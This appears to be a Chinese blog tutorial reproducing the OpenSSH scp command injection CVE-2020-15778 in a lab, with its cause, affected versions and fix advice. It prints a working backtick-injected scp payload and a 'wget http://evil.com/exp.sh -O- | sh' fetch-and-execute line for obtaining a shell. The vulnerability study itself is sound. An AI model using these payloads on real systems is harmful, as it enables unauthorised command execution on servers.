OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)

文章目录

前言

OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令,不过前提是需要知道ssh的登录密码。

OpenSSh是用于使用SSH(Secure SHell)协议进行加密远程登录的免费开源实现。它可以有效保护登录及数据的安全。

SCP(secure copy)是linux系统下基于ssh登录进行安全远程文件拷贝的命令,可以在linux之间复制文件和目录。

影响范围

OpenSSH <= 8.3p1

原因

使用scp复制文件到远程服务器时,在scp命令后面跟上文件的路径,具体格式如下:


scp SourceFile user@host:directory/TargetFile

在上述过程中,scp会使用”-t“参数来获取存储传入文件的路径,如下:


scp -t directory/TargetFile

OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)

问题就出在这个地方,也就是"scp.c"文件的989行,如上图所示。这个地方未对传入的文件路径进行检测防护。攻击者可以使用反引号包裹payload然后加上文件名执行scp命令,这时,payload将会发送到远程服务器并执行。

复现

环境信息 靶机kali : 172.16.24.151 利用场景 已知靶机ssh密码为123456

先使用scp命令正常发送文件到靶机:


scp ./111.txt test@172.16.24.151:/home/test/test/111

OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)
上图左边为攻击机,执行scp命令,把"111.txt"发送到右边的靶机上。

接下来执行带有payload的scp命令,payload内容为”在远程服务器上创建一个hack.sh文件“,如下:


scp ./111.txt test@172.16.24.151:'`touch /home/test/test/hack.sh`/home/test/test/112

OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)
上图左边的攻击机执行了”向远程服务器创建hack.sh文件“的payload和发送"111.txt"文件,在图右边靶机中接收到了"hack.sh"和"112(也就是重命名后的111.txt)"。

这个漏洞可能适用于远程服务器禁用了ssh登录,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。那么攻击者可以使用


wget http://evil.com/exp.sh -O- | sh

命令获取网站的shell。

修复建议

等待官方补丁
加强ssh密码或密钥的保护,周期性更换密码或密钥。
使用rsync代替scp

1. 全库网所有资源均来源于用户上传和网络,如有侵权请发送邮箱联系站长处理!
2. 如果你有好的资源或者原创教程,可以到审核区投稿发布,分享会有钻石奖励和额外收入!
3. 全库网所有的源码、教程等其它资源均源于用户上传发布,如有疑问,可直接联系发布作者处理
4. 如有链接无法下载、失效或广告,请联系全库网管理员核实处理!
5. 通过发布原创教学视频或优质源码资源可以免费获得全库网站内SVIP会员噢
6.全库网管理猿邮箱地址:admin@qkuser.com,我们会在收到您的邮件后三个工作日内完成处理!
7. 如遇到加密压缩包,默认解压密码为"qkuser.com",如遇到无法解压的请联系管理员!

全库网 » OpenSSH_scp命令注入漏洞复现(CVE-2020-15778)
禁止此类操作!